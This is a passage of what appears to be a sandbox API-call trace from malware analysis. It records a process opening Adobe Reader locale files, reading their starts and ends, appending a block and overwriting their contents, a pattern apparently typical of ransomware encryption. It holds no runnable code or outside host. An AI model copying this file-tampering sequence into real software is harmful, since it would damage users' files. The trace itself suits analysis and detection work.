(in: hFile=0x1f0, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0085.003] CloseHandle (hObject=0x1f0) returned 1 [0085.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\SaveAsRTF.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\saveasrtf.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.004] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.004] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4800 [0085.004] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.004] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.004] ReleaseMutex (hMutex=0x168) returned 1 [0085.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.SKY", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.SKY", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.SKY", lpUsedDefaultChar=0x0) returned 13 [0085.004] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.006] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3800 [0085.006] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.006] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3800 [0085.006] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.006] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.007] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.007] CloseHandle (hObject=0x1f0) returned 1 [0085.007] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Accessibility.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\accessibility.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.007] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.007] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa600 [0085.007] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.007] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.008] ReleaseMutex (hMutex=0x168) returned 1 [0085.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.SLV", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0085.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.SLV", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Accessibility.SLV", lpUsedDefaultChar=0x0) returned 17 [0085.008] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.010] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9600 [0085.010] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.013] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9600 [0085.014] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.014] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.014] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.014] CloseHandle (hObject=0x1f0) returned 1 [0085.014] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\eBook.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\ebook.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.015] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.015] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a00 [0085.015] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.015] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.015] ReleaseMutex (hMutex=0x168) returned 1 [0085.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.SLV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.SLV", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.SLV", lpUsedDefaultChar=0x0) returned 9 [0085.015] ReadFile (in: hFile=0x1f0, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0085.017] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.017] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0085.017] CloseHandle (hObject=0x1f0) returned 1 [0085.018] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\ReadOutLoud.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\readoutloud.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.018] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.018] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a00 [0085.018] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.018] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.019] ReleaseMutex (hMutex=0x168) returned 1 [0085.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.SLV", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0085.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.SLV", cchWideChar=15, lpMultiByteStr=0x1f7366c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.SLV", lpUsedDefaultChar=0x0) returned 15 [0085.019] ReadFile (in: hFile=0x1f0, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.024] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0085.024] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.026] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0085.026] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.026] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.026] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.027] CloseHandle (hObject=0x1f0) returned 1 [0085.027] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Updater.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\updater.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.027] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.027] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2800 [0085.027] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.028] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.028] ReleaseMutex (hMutex=0x168) returned 1 [0085.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.SLV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.SLV", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Updater.SLV", lpUsedDefaultChar=0x0) returned 11 [0085.028] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1800 [0085.033] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.035] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1800 [0085.035] WriteFile (in: hFile=0x1f0, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.035] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.035] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.035] CloseHandle (hObject=0x1f0) returned 1 [0085.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\DigSig.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\digsig.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1f200 [0085.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.036] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.037] ReleaseMutex (hMutex=0x168) returned 1 [0085.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.SVE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.SVE", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.SVE", lpUsedDefaultChar=0x0) returned 10 [0085.037] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.042] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1e200 [0085.042] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.045] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1e200 [0085.046] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a2048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a2048*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.046] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.046] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.046] CloseHandle (hObject=0x1f0) returned 1 [0085.047] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\PPKLITE.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\ppklite.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.047] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.047] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x7dc00 [0085.047] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.047] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.047] ReleaseMutex (hMutex=0x168) returned 1 [0085.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.SVE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.SVE", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.SVE", lpUsedDefaultChar=0x0) returned 11 [0085.048] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.050] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7cc00 [0085.050] ReadFile (in: hFile=0x1f0, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.259] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7cc00 [0085.259] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.260] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.260] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.260] CloseHandle (hObject=0x1f0) returned 1 [0085.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.261] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.261] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe2 [0085.262] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.262] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.262] ReleaseMutex (hMutex=0x168) returned 1 [0085.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0085.262] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ee6688, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee6688*, lpNumberOfBytesRead=0x2e9f2bc*=0xe2, lpOverlapped=0x0) returned 1 [0085.263] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.263] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2e9f2d0*=0x66a, lpOverlapped=0x0) returned 1 [0085.265] CloseHandle (hObject=0x1f0) returned 1 [0085.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\BRdlang32.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 